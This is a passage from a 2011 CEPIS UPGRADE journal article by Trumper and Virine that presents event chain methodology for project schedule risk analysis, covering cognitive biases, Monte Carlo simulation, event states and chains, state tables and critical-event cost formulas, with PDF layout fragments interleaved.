project delays, cost overruns, and even project failures.
Therefore, creating accurate project schedules, which reflect potential risks and uncertainties, remains one of the
main challenges in project management.
In [1][2][3] the authors reviewed technical, psychological and political explanations for inaccurate scheduling and
forecasting. They found that strategic misrepresentation
under political and organizational pressure, expressed by
project planners as well as cognitive biases, play major roles
in inaccurate forecasting. In other words, project planners
either unintentionally, due to psychological biases, or intentionally, due to organizational pressures, consistently
deliver inaccurate estimates for cost and schedule, which in
turn lead to inaccurate forecasts [4].
Among the cognitive biases related to project forecasting is the planning fallacy [5] and the optimism bias [6].
According to one explanation, project managers do not account for risks or other factors that they perceive as lying
outside of the specific scope of a project. Project managers
may also discount multiple improbable high-impact risks
because each has very small probability of occurring. It has
been proposed in [7] that limitations in human mental processes cause people to employ various simplifying strategies
to ease the burden of mentally processing information when
making judgments and decisions. During the planning stage,
project managers rely on heuristics or rules of thumb to make
their estimates. Under many circumstances, heuristics lead
to predictably faulty judgments or cognitive biases [8]. The
availability heuristic [9][10] is a rule of thumb with which
decision makers assess the probability of an event by the
22
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Authors
Michael Trumper has over 20 years experience encompassing
technical communications, instructional and software design for
project risk and economics software. He has consulted in the
development and delivery of project risk analysis and
management software, consulting, and training solutions to
clientele that includes NASA, Boeing, Dynatec, Lockheed
Martin, Proctor and Gamble, L-3com and others. Coauthored
"Project Decisions: the art and science" (published in 2007 and
currently in PMI bookstore) and authored papers on quantitative
methods in project risk analysis. <[email protected]>.
Lev Virine has more than 20 years of experience as a structural
engineer, software developer, and project manager. In the past
10 years he has been involved in a number of major projects
performed by Fortune 500 companies and government agencies to establish effective decision analysis and risk management
processes as well as to conduct risk analyses of complex projects.
Lev’s current research interests include the application of
decision analysis and risk management to project management.
He writes and speaks to conferences around the world
on project decision analysis, including the psychology of
judgment and decision-making, modeling of business processes,
and risk management. Lev received his doctoral degree in
engineering and computer science from Moscow State
University, Russia. <[email protected]>.
ease with which instances or occurrences can be brought to
mind. For example, project managers sometimes estimate
task duration based on similar tasks that have been previously completed. If they base their judgments on their most
or least successful tasks, this can cause inaccurate estimations. The anchoring heuristic refers to the human tendency
to remain close to an initial estimate. Anchoring is related
to overconfidence in estimation of probabilities – a tendency to provide overly optimistic estimates of uncertain
events. Arbitrary anchors can also affect people’s estimates
of how well they will perform certain problem solving tasks
[11].
Farewell Edition
© Novática
Risk Management
“
Risk management has become
a critical component of project management processes
Problems with estimation are also related to selective
perception - the tendency for expectations to affect perception [12]. Sometimes selective perception is referred, as "I
only see what I want to see". One of the biases related to
selective perception is the confirmation bias. This is the tendency of decision makers to actively seek out and assign
more weight to evidence that confirms their hypothesis, and
to ignore or underweight evidence that could discount their
hypothesis [13][14].
Another problem related to improving the accuracy of
project schedules is the complex relationship between different uncertainties. Events can occur in the middle of an
activity, they can be correlated with each other, one event
can cause other events, the same event may have different
impacts depending upon circumstances, and different mitigation plans can be executed under different conditions.
These complex systems of uncertainties must be identified
and visualized to improve the accuracy of project schedules.
Finally, the accuracy of project scheduling can be improved by constantly refining the original plan using actual
project performance measurement [15]. This can be achieved
through analysis of uncertainties during different phases of
the project and incorporating new knowledge into the project
schedule. In addition, a number scheduling techniques such
as resource leveling and the incorporation of mitigation
plans, and the presence of repeated activities are difficult
to model in project schedules with risks and uncertainties.
Therefore, the objective is to identify an simpler process,
which includes project performance measurement and other
analytical techniques.
Event chain methodology has been proposed as an attempt to satisfy the following objectives related to project
scheduling and forecasting by:
1. Mitigating the effects negative of motivational and
cognitive biases and improve the accuracy of estimating and
forecasting.
2. Simplifying the process of modeling risks and uncertainties in project schedules, in particular, by improving
the ability to visualize multiple events that affect project
schedules and perform reality checks.
3. Performing more accurate quantitative analysis while
accounting for such factors as the relationships between
different events and the actual moment of events.
4. Providing a flexible framework for scheduling which
includes project performance measurement, resource
leveling, execution of migration plans, correlations between
risks, repeated activities, and other types of analysis.
2 Existing Techniques as Foundations for Event
Chain Methodology
The accuracy of project scheduling with risks and un-
© Novática
Farewell Edition
”
certainties can be improved by applying a process or
workflow tailored to the particular project or set of projects
(portfolio) rather than using one particular analytical technique. According to the PMBOK® Guide of the Project
Management Institute [16] such processes can include methods of identification of uncertainties, qualitative and quantitative analysis, risk response planning, and risk monitoring and control. The actual processes may involve various
tools and visualization techniques.
One of the fundamental issues associated with managing project schedules lies in the identification of uncertainties. If the estimates for input uncertainties are inaccurate,
this will lead to inaccurate results regardless of the analysis
methodology. The accuracy of project planning can be significantly improved by applying advanced techniques for
identification risks and uncertainties. Extensive sets of techniques and tools which can be used by individuals as well
as in groups are available to simplify the process of uncertainty modeling [17][18].
The PMBOK® Guide recommends creating risk templates based on historical data. There are no universal, exhaustive risk templates for all industries and all types of
projects. Project management literature includes many examples of different risk lists which can be used as templates
[19]. A more advanced type of template is proposed in [20]:
risk questionnaires. They provide three choices for each risk
where the project manager can select when the risk can
manifest itself during the project: a) at anytime b) about
half the time, and c) less than half the time. One of the most
comprehensive analyses of risk sources and categories was
performed by Scheinin and Hefner [21]. Each risk in their
risk breakdown structure includes what they call a "frequency" or rank property.
PMBOK® Guide recommends a number of quantitative analysis techniques, such as Monte Carlo analysis, decision trees and sensitivity analysis. Monte Carlo analysis
is used to approximate the distribution of potential results
based on probabilistic inputs [22][23][24][25]. Each trial is
generated by randomly pulling a sample value for each input variable from its defined probability distribution. These
input sample values are then used to calculate the results.
This procedure is then repeated until the probability distri-
“
Event chain methodology is
currently used in many
organizations as part of
their project risk
management process
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011
23
Risk Management
“
During the planning stage, project managers rely on heuristics
or rules of thumb to make their estimates
butions are sufficiently well represented to achieve the desired level of accuracy. The main advantage of Monte Carlo
simulation is that it helps to incorporate risks and uncertainties into the process of project scheduling.
However Monte Carlo analysis has the following limitations:
1. Project managers perform certain recovery actions
when a project slips. These actions in most cases are not
taken into account by Monte Carlo. In this respect, Monte
Carlo may give overly pessimistic results [26].
2. Defining distributions is not a trivial process. Distributions are a very abstract concept that some project managers find difficult to work with. [27].
Monte Carlo simulations may be performed based on
uncertainties defined as risk drivers, or events [28][29]. Such
risk drivers may lead to increases in task duration or cost.
Each event is defined by different probability and impact,
and can be assigned to a specific task. For example, event
"problem with delivery of the component" may lead to 20%
delay of the task with probability 20%. The issue with such
approach is thatrelations between risks must be defined and
taken into account during simulation process. For example,
in many cases one risk will trigger another risk but only
based on certain conditions. These relationships can be very
difficult to define using traditional methods.
Another approach to project scheduling with uncertainties was developed by Goldratt [30], who applied the theory
of constraints to project management. The cornerstone of
the theory is resource constrained critical paths called a "critical chain". Goldratt’s approach is based on a deterministic
critical path method. To deal with uncertainties, Goldratt
suggests using project buffers and encouraging early task
completion. Although critical chain has proved to be a very
effective methodology for a wide range of projects [31][32],
it is not fully embraced by many project managers because
it requires change to established processes.
A number of quantitative risk analysis techniques have
been developed to deal with specific issues related to uncertainty management. Decisions trees [33] help to calculate
the expected value of projects as well as identify project
alternatives and to select better courses of action. Sensitivity analysis is used to determine which variables, such as
risks, have most potential impact on projects [25]. These
types of analysis usually become important components in
a project planning process that accounts for risks and uncertainties.
One of the approaches, which may help to improve accuracy of project forecasts, is the visualization of project
plans with uncertainties. Traditional visualization techniques
include bar charts or Gantt charts and various schedule network diagrams [16]. Visual modeling tools are widely used
to describe complex models in many industries. Unified
24
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
modeling language (UML) is actively used in software design [34][35].
Among integrated processes designed to improve the
accuracy of project planning with risks and uncertainties is
the reference class forecasting technique [36]. This process includes identifying similar past and present projects,
establishing probability distributions for selected reference
classes and using them to establish the most likely outcome
of a specific project. The American Planning Association
officially endorses reference class forecasting. Analysis
based on historical data helps to make more accurate forecasts; however, they have the following major shortcomings:
1. Creating sets of references or analogue sets is not a
trivial process because it involves a relevance analysis of
previous projects and previous projects may not be relevant
to the current one.
2. Many projects, especially in the area of research and
development, do not have any relevant historical data.
3 Overview of Event Chain Methodology
Event chain methodology is a practical schedule network analysis technique as well as a method of modeling
and visualizing of uncertainties. Event chain methodology
comes from the notion that regardless of how well project
schedules are developed, some events may occur that will
alter it. Identifying and managing these events or event
chains (when one event causes another event) is the focus
of event chain methodology. The methodology focuses on
events rather than a continuous process for changing project
environments because with continuous problems within a
project it is possible to detect and fix them before they have
a significant effect upon the project.
Project scheduling and analysis using events chain methodology includes the following steps:
1. Create a project schedule model using best-case scenario estimates of duration, cost, and other parameters. In
other words, project managers should use estimates that
they are comfortable with, which in many cases will be
optimistic. Because of a number of cognitive and motivational factors outlined earlier project managers tend to create optimistic estimates.
2. Define a list of events and event chains with their
probabilities and impacts on activities, resources, lags, and
calendars. This list of events can be represented in the form
of a risk breakdown structure. These events should be identified separately (separate time, separate meeting, different
experts, different planning department) from the schedule
model to avoid situations where expectations about the
project (cost, duration, etc.) affect the event identification.
3. Perform a quantitative analysis using Monte Carlo
simulations. The results of Monte Carlo analysis are statis-
Farewell Edition
© Novática
Risk Management
Figure 1: Events cause Activity to move to transform from Ground States to Excited States.
tical distributions of the main project parameters (cost, duration, and finish time), as well as similar parameters associated with particular activities. Based on such statistical
distributions, it is possible to determine the chance the
project or activity will be completed on a certain date and
within a certain cost. The results of Monte Carlo analysis
can be expressed on a project schedule as percentiles of
start and finish times for activities.
4. Perform a sensitivity analysis as part of the quantitative analysis. Sensitivity analysis helps identify the crucial activities and critical events and event chains. Crucial
activities and critical events and event chains have the most
affect on the main project parameters. Reality checks may
be used to validate whether the probability of the events are
defined properly.
5. Repeat the analysis on a regular basis during the
course of a project based on actual project data and include
the actual occurrence of certain risks. The probability and
impact of risks can be reassessed based on actual project
performance measurement. It helps to provide up to date
forecasts of project duration, cost, or other parameters.
4 Foundations of Event Chain Methodology
Event chain methodology expands on the Monte Carlo
simulations of project schedules and particularly risk driver
(events) approach. Event chain methodology focuses on the
relationship between risks, conditions for risk occurrence,
and visualization of the risks events.
Some of the terminology used in event chain methodology comes from the field of quantum mechanics. In particular, quantum mechanics introduces the notions of excitation and entanglement, as well as grounded and excited
states [37][38]. The notion of event subscription and
multicasting is used in object oriented software development as one of the types of interactions between objects
[39][40].
© Novática
Farewell Edition
5 Basic Principles of Event Chain Methodology
Event chain methodology is based on six major principles. The first principle deals with single events, the second
principle focuses on multiple related events or event chains,
the third principle defines rules for visualization of the events
or event chains, the fourth and fifth principles deals with
the analysis of the schedule with event chains, and the sixth
principle defines project performance measurement techniques with events or event chains. Event chain methodology is not a completely new technique as it is based on
existing quantitative methods such Monte Carlo simulation
and Bayesian theorem.
Principle 1: Moment of Event and Excitation States
An activity in most real life processes is not a continuous and uniform procedure. Activities are affected by external events that transform them from one state to another.
The notion of state means that activity will be performed
differently as a response to the event. This process of changing the state of an activity is called excitation. In quantum
mechanics, the notion of excitation is used to describe elevation in energy level above an arbitrary baseline energy
state. In Event chain methodology, excitation indicates that
something has changed the manner in which an activity is
performed. For example, an activity may require different
resources, take a longer time, or must be performed under
different conditions. As a result, this may alter the activity’s
“
One of the fundamental
issues associated with
managing project schedules
lies in the identification
of uncertainties
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011
25
Risk Management
“
Event chain methodology is a practical schedule network
analysis technique as well as a method of modeling
and visualizing of uncertainties
”
cost and duration.
The original or planned state of the activity is called a
ground state. Other states, associated with different events
are called excited states (Figure 1). For example, in the middle of an activity the project requirements change. As a result, a planned activity must be restarted. Similarly to quantum mechanics, if significant event affects the activities, it
will dramatically affect the property of the activity, for example cancel the activity.
Events can affect one or many activities, material or work
resources, lags, and calendars. Such event assignment is an
important property of the event. An example of an event
that can be assigned to a resource is an illness of a project
team member. This event may delay of all activities to which
this resource is assigned. Similarly resources, lags, and
calendars may have different grounded and excited states.
For example, the event "Bad weather condition" can transform a calendar from a ground state (5 working days per
weeks) to an excited state: non working days for the next 10
days.
Each state of activity in particular may subscribe to certain events. It means that an event can affect the activity
only if the activity is subscribed to this event. For example,
an assembly activity has started outdoors. The ground state
the activity is subscribed to the external event "Bad weather".
If "Bad weather" actually occurs, the assembly should move
indoors. This constitutes an excited state of the activity. This
new excited state (indoor assembling) will not be subscribed
Risk most likely occurs at
the end of the activity
(triangular distribution for
moment of risk)
Mean activity duration with the
event occurred
th
90 percentile
to the "Bad weather": if this event occurs it will not affect
the activity.
Event subscription has a number of properties. Among
them are:
„ Impact of the event is the property of the state rather
than event itself. It means that impact can be different if an
activity is in a different state. For example, an activity is
subscribed to the external event "Change of requirements".
In its ground state of the activity, this event can cause a
50% delay of the activity. However, if the event has occurred, the activity is transformed to an excited state. In an
excited state if "Change of requirement" is occurs again, it
will cause only a 25% delay of the activity because management has performed certain actions when event first occurred.
„ Probability of occurrence is also a property of subscription. For example, there is a 50% chance that the event
will occur. Similarly to impact, probability of occurrence
can be different for different states;
„ Excited state: the state the activities are transformed
to after an event occurs;
„ Moment of event: the actual moment when the event
occurs during the course of an activity. The moment of event
can be absolute (certain date and time) or relative to an
activity’s start and finish times. In most cases, the moment
when the event occurs is probabilistic and can be defined
using a statistical distribution (Figure 1). Very often, the
overall impact of the event depends on when an event ocEqual probability of the
risk occurrence during
the course of activity
Risk occurs only ay the
end of activity
Risk
Risk
5.9 days
6.3 days
7.5 days
7.9 days
9.14 days
10 days
Risk
Table 1: Moment of Risk Significantly affects Activity Duration.
“
Some of the terminology used in event chain methodology
comes from the field of quantum mechanics
26
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
Farewell Edition
© Novática
Risk Management
Independent events in each activity
Event chain
18.9 days
19.0 days
22.9 days
24.7 days
Mean duration
th
90 percentile (high estimate of duration)
Table 2: Event Chain leads to Higher Project Duration compared to the Series of Independent
Events with the Same Probability.
curs. For example, the moment of the event can affect total
duration of activity if it is restarted or cancelled. Below is
an example how one event (restart activity) with a probability of 50% can affect one activity (Table 1). Monte Carlo
simulation was used to perform the analysis. Original activity duration is 5 days:
Events can have negative (risks) and positive (opportunities) impacts on projects. Mitigation efforts are considered to be events, which are executed if an activity is in an
excited state. Mitigation events may attempt to transform
the activity to the ground state.
Impacts of an event affecting activities, a group of activities, or lags can be:
„ Delay activity, split activity, or start activity later;
delays can be defined as fixed (fixed period of time) and
relative (in percent of activity duration); delay also can be
negative
„ Restart activity
„ Stop activity and restart it later if required
„ End activity
„ Cancel activity or cancel activity with all successors,
which is similar to end activity except activity will be marked
as canceled to future calculation of activity’s success rate
„ Fixed or relative increase or reduction of the cost
„ Redeploy resources associated with activity; for example a resource can be moved to another activity
„ Execute events affecting another activity, group of
activities, change resource, or update a calendar. For example, this event can start another activity such as mitigation
plan, change the excited state of another activity, or update
event subscriptions for the excited state of another activity
Event 1
Event 2
Event chain
Activity 1
Activity 2
Event 3
Activity 3
Figure 2: Example of Event Chain.
© Novática
Farewell Edition
The impacts of events are characterised by some additional parameters. For example, a parameter associated with
the impact "Fixed delay of activity" is the actual duration
of the delay.
The impact of events associated with resources is similar to the impact of activity events. Resource events will
affect all activities this resource is assigned to. If a resource
is only partially involved in the activity, the probability of
event will be proportionally reduced. The impact of events
associated with a calendar changes working and non-working times.
One event can have multiple impacts at the same time.
For example, a "Bad weather" event can cause an increase
of cost and duration at the same time. Event can be local,
affecting a particular activity, group of activities, lags, resources, and calendars, or global affecting all activities in
the project.
Principle 2: Event Chains
Some events can cause other events. These series of
events form event chains, which may significantly affect
the course of the project by creating a ripple effect through
the project (Figure 2). Here is an example of an event chain
ripple effect:
1. Requirement changes cause a delay of an activity.
2. To accelerate the activity, the project manager diverts resources from another activity.
3. Diversion of resources causes deadlines to be missed
on the other activity
4. Cumulatively, this reaction leads to the failure of the
whole project.
Event chains are defined using event impacts called "Execute event affecting another activity, group of activities,
change resources or update calendar". Here is how the aforementioned example can be defined using Event chain methodology:
1. The event "Requirement change" will transform the
activity to an excited state which is subscribed to the event
"Redeploy resources".
2. Execute the event "Redeploy resources" to transfer
resources from another activity. Other activities should be
in a state subscribed to the "Redeploy resources" event. Otherwise resources will be not available.
3. As soon as the resources are redeployed, the activity
with reduced resources will move to an excited state and
the duration of the activity in this state will increase.
4. Successors of the activity with the increased dura-
CEPIS UPGRADE Vol. XII, No. 5, December 2011
27
Risk Management
“
Event chain methodology is actively used in many organizations,
including large corporations and government agencies
”
tion will start later, which can cause a missed
project deadline.
An event that causes another event is
called the sender. The sender can cause multiple events in different activities. This effect
is called multicasting. For example a broken
component may cause multiple events: a delay in assembly, additional repair activity, and
some new design activities. Events that are
caused by the sender are called receivers.
Receiver events can also act as a sender for
another event.
The actual effect of an event chain on a
project schedule can be determined as a result of quantitative analysis. The example
below illustrates the difference between event
chain and independent events (Figure 2 and
Table 2). Monte Carlo simulations were used
to perform the analysis. The project includes
three activities of 5 days each. Each activity
is affected by the event "restart activity" with a probability
of 50%.
Below are four different strategies for dealing with risks
[41] defined using event chain methodology’s event chain
principle:
Event chain: Risk transfer
Event 1
Event 2
Activity 1
Excited state
Activity 2
Figure 3: Event chain: Risk transfer
Figure 5: Example of Event Chain Diagram.
1. Risk acceptance: excited state of the activity is considered to be acceptable.
2. Risk transfer: represents an event chain; the impact
of the original event is an execution of the event in another
activity (Figure 3).
3. Risk mitigation: represents an event chain; the original event transforms an activity from a ground state to an
excited state, which is subscribed to a mitigation event; the
mitigation event that occurs in excited state will try to transform activities to a ground state or a lower excited state
(Figure 4).
4. Risk avoidance: original project plan is built in such
a way that none of the states of the activities are subscribed
to this event.
Principle 3: Event Chain Diagrams
and State Tables
Complex relationships between events
can be visualized using event chain diagrams
(Figure 5). Event chain diagrams are presented on the Gantt chart according to the
specification. This specification is a set of
rules, which can be understood by anybody
using this diagram.
1. All events are shown as arrows.
Names and/or IDs of events are shown next
Figure 4: Event Chain - Risk mitigation
28
CEPIS UPGRADE Vol. XII, No. 5, December 2011
to the arrow.
Farewell Edition
© Novática
Risk Management
Ground state
Event 1: Architectural
changes
Event 2: Development
tools issue
Probability: 20%
Moment of event: any
time
Excited state: refactoring
Impact: delay 2 weeks
Probability: 10%
Moment of event: any
time
Excited state: refactoring
Impact: delay 1 week
Excited state: refactoring
Event 3: Minor
requirements change
Probability: 10%
Moment of event:
beginning of the state
Excited state: minor code
change
Impact: delay 2 days
Excited state: minor code
change
Table 3: Example of the State Table for Software Development Activity.
2. Events with negative impacts (threads) are represented by down arrows; events with positive impacts (opportunities) are represented by up arrows.
3. Individual events are connected by lines representing the event chain.
4. A sender event with multiple connecting lines to receivers represents multicasting.
5. Events affecting all activities (global events) are
shown outside the Gantt chart. Threats are shown at the top
of the diagram. Opportunities are shown at the bottom of
the diagram.
Often event chain diagrams can become very complex.
In these cases, some details of the diagram do not need to
be shown. Here is a list of optional rules for event chain
diagrams:
1. Horizontal positions of the event arrows on the Gantt
bar correspond with the mean moment of the event.
2. Probability of an event can be shown next to the event
arrow.
3. Size of the arrow represents relative probability of
an event. If the arrow is small, the probability of the event
is correspondingly small.
4. Excited states are represented by elevating the associated section of the bar on the Gantt chart (see Figure 1).
The height of the state’s rectangle represents the relative
impact of the event.
5. Statistical distributions for the moment of event can
be shown together with the event arrow (see Figure 1).
6. Multiple diagrams may be required to represent different event chains for the same schedule.
7. Different colors can be use to represent different
events (arrows) and connecting lines associated with different chains.
The central purpose of event chain diagrams is not to
show all possible individual events. Rather, event chain diagrams can be used to understand the relationship between
events. Therefore, it is recommended that event chain diagrams be used only for the most significant events during
the event identification and analysis stage. Event chain diagrams can be used as part of the risk identification process,
© Novática
Farewell Edition
particularly during brainstorming meetings. Members of
project teams can draw arrows between associated activities on the Gantt chart. Event chain diagrams can be used
together with other diagramming tools.
Another tool that can be used to simplify the definition
of events is a state table. Columns in the state table represent events; rows represent states of activity. Information
for each event in each state includes four properties of event
subscription: probability, moment of event, excited state,
and impact of the event. State table helps to depict an activity’s subscription to the events: if a cell is empty the state
is not subscribed to the event.
An example of state table for a software development
activity is shown on Table 3. The ground state of the activity is subscribed to two events: "architectural changes" and
"development tools issue". If either of these events occur,
they transform the activity to a new excited state called
"refactoring". "Refactoring" is subscribed to another event:
"minor requirement change". Two previous events are not
subscribed to the refactoring state and therefore cannot
reoccur while the activity is in this state.
Principle 4: Monte Carlo Schedule Risk Analysis
Once events, event chains, and event subscriptions are
defined, Monte Carlo analysis of the project schedule can
be performed to quantify the cumulative impact of the
events. Probabilities and impacts of events are used as an
input data for analysis.
In most real life projects, even if all the possible risks
are defined, there are always some uncertainties or fluctuations or noise in duration and cost. To take these fluctuations into account, distributions related to activity duration,
start time, cost, and other parameters should be defined in
addition to the list of events. These statistical distributions
must not have the same root cause as the defined events, as
this will cause a double-count of the project’s risk.
Monte Carlo simulation process for Event chain methodology has a number of specific features. Before the sampling process starts all event chains should be identified.
Particularly, all sender and receiver events should be iden-
CEPIS UPGRADE Vol. XII, No. 5, December 2011
29
Risk Management
tified through an analysis of state tables for each activity.
Also, if events are assigned to resources, they need to be
reassigned to activities based on resource usage for each
particular activity. For example, if a manager is equally involved in two activities, a risk "Manager is not familiar with
technology" with a probability 6% will be transferred to both
activities with probability of 3% for each activity. Events
assigned to summary activities will be assigned to each activity in the group. Events assigned to lags are treated the
same way as activities.
Each trial of the Monte Carlo simulation includes the
following steps specific to Event chain methodology:
1. Moments of events are calculated based of statistical
distribution for moment of event on each state.
2. Determines if sender events have actually occurred at
this particular trial based on probability of the sender.
3. Determines if probabilities of receiver events are updated based on sender event. For example, if a sender event
unconditionally causes a receiver event, probability of a receiver event will equal 100%.
4. Determines if receiver events have actually occurred; if
a receiver event is a sender event at the same time, the process
of determining probabilities of receiver events will continue.
5. The process will repeat for all ground and excited states
for all activities and lags.
6. If an event that causes the cancellation of an activity
occurs, this activity will be identified as canceled and the activity’s duration and cost will be adjusted.
7. If an event that causes the start of another activity occurs, such as execution of mitigation plan, the project schedule
will be updated for the particular trial. Number of trials where
the particular activity is started will be counted.
8. The cumulative impact of the all events on the activity’s duration and cost will be augmented by accounting for
fluctuations of duration and cost.
The results of the analysis are similar to the results of
classic Monte Carlo simulations of project schedules. These
results include statistical distributions for duration, cost, and
success rate of the complete project and each activity or
group of activities. Success rates are calculated based on
the number of simulations where the event "Cancel activity" or "Cancel group of activities" occurred. Probabilistic
and conditional branching, calculating the chance that project
will be completed before deadline, probabilistic cashflow
and other types of analysis are performed in the same manner as with a classic Monte Carlo analysis of the project
schedules. Probability of activity existence is calculated
based on to two types of inputs: probabilistic and conditional branching and number of trials where an activity is
executed as a result of a "Start activity" event.
Principle 5: Critical Event Chains and Event Cost
Single events or event chains that have the most potential to affect the projects are the critical events or critical
event chains. By identifying critical events or critical event
chains, it is possible mitigate their negative effects. These
critical event chains can be identified through sensitivity analy30
CEPIS UPGRADE Vol. XII, No. 5, December 2011
sis: by analyzing the correlations between the main project
parameters, such as project duration or cost, and event chains.
Critical event chains based on cost and duration may
differ. Because the same event may affect different activities and have different impact of these activities, the goal is
to measure a cumulative impact of the event on the project
schedule. Critical event chains based on duration are calculated using the following approach. For each event and
event chain on each trial the cumulative impact of event on
project duration (Dcum) is calculated based on the formula:
n
Dcum =
∑
i =1
(Di’ - Di)*ki
where n is number of activities in which this event or
event chain occurs, Di is the original duration of activity i
and Di’is the duration of activity i with this particular event
taken into an account, ki is the Spearman rank order correlation coefficient between total project duration and duration of activity i. If events are assigned to calendars, Di’ is
the duration of activity with the calendar used as a result of
the event.
Cumulative impact of event on cost (Ccum) is calculated
based on formula:
n
Ccum =
∑
i =1
(Ci’ - Ci)
where Ci is the original cost of activity and Ci’is the activity cost taking into account the this particular event.
Spearman rank order correlation coefficient is calculated based on the cumulative effect of the event on cost
and duration (Ccum and Dcum ) and total project cost and duration.
One of the useful measures of the impact of the event is
event cost or additional expected cost, which would be added
to project as a result of the event. Event cost is not a mitigation cost. Event cost can be used as decision criteria for
selection of risk mitigation strategies. Mean event cost Cevent
is normalized cumulative effect of the event on cost and
calculated according to the following formula:
n
Cevent = (Cproject’ - Cproject) * kevent /
∑
i=1
ki
where Cproject’ is the mean total project cost with risks
and uncertainties, Cproject is the mean total project cost without taking into account events, but with accounting for fluctuations defined by statistical distributions, kevent is the correlation coefficient between total project cost and cumulative impact of the event on cost on the particular activity, ki
is correlation coefficient between total cost and cumulative
impact of the event on the activity i. Event cost can be calculated based on any percentile associated with statistical
distribution of project cost.
Farewell Edition
© Novática
Risk Management
K
Event
Cost
41%
0.77
5,300
50%
0.50
3.440
0.20
1,380
Tast 1 Task 2 Task 3
Event 1
47%
Event 3
Event 2
10%
Figure 6: Critical Events and Event Chains.
Critical events or critical event chains can be visualized
using a sensitivity chart, as shown on Figure 6. This chart
represents events affecting cost in the schedule shown on
Figure 2. Event 1 occurs in Task 1 (probability 47%) and
Task 3 (probability 41%). Event 3 occurs in Task 3 (probability 50%) and Event 2 occurs in Task 2 (probability 10%).
All events are independent. The impact of all these events
is "restart task". All activities have the same variable cost
$6,667; therefore, the total project cost without risks and
uncertainties equals $20,000. Total project cost with risks
as a result of analysis equals $30,120. Cost of Event 1 will
be $5,300, Event 2 will be $3,440, and Event 3 will be
$1,380. Because this schedule model does not include fluctuations for the activity cost, sum of event costs equals difference between original cost and cost with risks and uncertainties ($10,120).
Critical events and events chains can be used to perform a reality check. If the probability and outcome of events
are properly defined, the most important risks, based on
subjective expert judgment, should be critical risks as a result of quantitative analysis.
Principle 6: Project Performance Measurement
with Event and Event Chains
Monitoring the progress of activities ensures that updated information is used to perform the analysis. While
this is true for all types of analysis, it is a critical principle
of event chain methodology. During the course of the
project, using actual performance data it is possible to recalculate the probability of occurrence and moment of the
events. The analysis can be repeated to generate a new
project schedule with updated costs or durations.
But what should one do if the activity is partially completed and certain events are assigned to the activity? If the
event has already occurred, will it occur again? Or vice versa,
if nothing has occurred yet, will it happen?
There are three distinct approaches to this problem:
1. Probabilities of a random event in partially completed
activity stay the same regardless of the outcome of previous events. This is mostly related to external events, which
cannot be affected by project stakeholders. It was originally
determined that "bad weather" event during a course of oneyear construction project can occur 10 times. After a half
year, bad weather has occurred 8 times. For the remaining
© Novática
Farewell Edition
Correlation Coefficient (K)
0
0.2
0.4
0.6
0.8
half year, the event could still occur 5 times. This approach
is related to psychological effect called "gambler’s fallacy"
or belief that a successful outcome is due after a run of bad
luck [42].
2. Probabilities of events in a partially completed activity depend on the moment of the event. If the moment of
risk is earlier than the moment when actual measurement is
performed, this event will not affect the activity. For example, activity "software user interface development" takes
10 days. Event "change of requirements" can occur any time
during a course of activity and can cause a delay (a uniform distribution of the moment of event). 50% of work is
completed within 5 days. If the probabilistic moment of
event happens to be between the start of the activity and 5
days, this event will be ignored (not cause any delay). In
this case, the probability that the event will occur will be
reduced and eventually become zero, when the activity
approaches the completion.
3. Probabilities of events need to be defined by the subjective judgment of project managers or other experts at
any stage of an activity. For example, the event "change of
requirements" has occurred. It may occur again depending
on many factors, such as how well these requirements are
defined and interpreted and the particular business situation. To implement this approach excited state activities
should be explicitly subscribed or not subscribed to certain
events. For example, a new excited state after the event
"change of requirements" may not be subscribed to this
event again, and as a result this event will not affect the
activity a second time.
The chance that the project will meet a specific deadline can be monitored and presented on the chart shown on
Figure 7. The chance changes constantly as a result of various events and event chains. In most cases, this chance is
reducing over time. However, risk response efforts, such
as risk mitigations, can increase the chance of successfully
meeting a project deadline. The chance of the project meeting the deadline is constantly updated as a result of the quantitative analysis based on the original assessment of the
project uncertainties and the actual project performance
data.
In the critical chain method, the constant change in the
size of the project buffer is monitored to ensure that project
is on track. In event chain methodology, the chance of the
CEPIS UPGRADE Vol. XII, No. 5, December 2011
31
Risk Management
Figure 7: Monitoring Chance of Project Completion on a Certain Date.
project meeting a certain deadline during different phases
of the project serves a similar purpose: it is an important
indicator of project health. Monitoring the chance of the
project meeting a certain deadline does not require a project
buffer. It is always possible to attribute particular changes
in the chance of meeting a deadline to actual and forecasted
events and event chains, and as a result, mitigate their negative impact.
6 Conclusions
Event chain methodology is designed to mitigate the
negative impact of cognitive and motivational biases related
to the estimation of project uncertainties:
„ The task duration, start and finish time, cost, and other
project input parameters are influenced by motivational factors such as total project duration to much greater extent
than events and event chains. This occurs because events
cannot be easily translated into duration, finish time, etc.
Therefore, Event chain methodology can help to overcome
negative affects of selective perception, in particular the
confirmation bias and, within a certain extent, the planning
fallacy and overconfidence.
„ Event chain methodology relies on the estimation of
duration based on best-case scenario estimates and does not
necessarily require low, base, and high estimations or statistical distribution and, therefore, mitigates the negative
effect of anchoring.
„ The probability of events can be easily calculated
based on historical data, which can mitigate the effect of the
availability heuristic. Compound events can be easy broken
into smaller events. The probability of events can be calculated using relative frequency approach where probability
equals the number an event occurs divided by the total
number of possible outcomes. In classic Monte Carlo
simulations, the statistical distribution of input parameters
can also be obtained from the historical data; however, the
procedure is more complicated and is often not used in practice.
32
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Event chain methodology allows taking into an account
factors which were not analyzed by other schedule network
analysis techniques: moment of event, chains of events, delays in events, execution of mitigation plans and others.
Complex relationship between different events can be visualized using event chain diagrams and state tables, which
simplifies event and event chain identification.
Finally, Event chain methodology includes techniques
designed to incorporate new information about actual
project performance to original project schedule and therefore constantly improve accuracy of the schedule during a
course of a project. Event chain methodology offers practical solution for resource leveling, managing mitigation
plans, correlations between events and other activities.
Event chain methodology is a practical approach to
scheduling software projects that contain multiple uncertainties. A process that utilizes this methodology can be easily used in different projects, regardless of size and complexity. Scheduling using Event chain methodology is an
easy to use process, which can be can be performed using
off-the-shelf software tools. Although Event chain methodology is a relatively new approach, it is actively used in
many organizations, including large corporations and government agencies.
References
[1] B. Flyvbjerg, M.K.S. Holm, S.L. Buhl. Underestimating costs in public works projects: Error or Lie? Journal of the American Planning Association, vol. 68, no.
3, pp. 279-295, 2002.
[2] B. Flyvbjerg, M.K.S. Holm, S.L. Buhl.. What causes
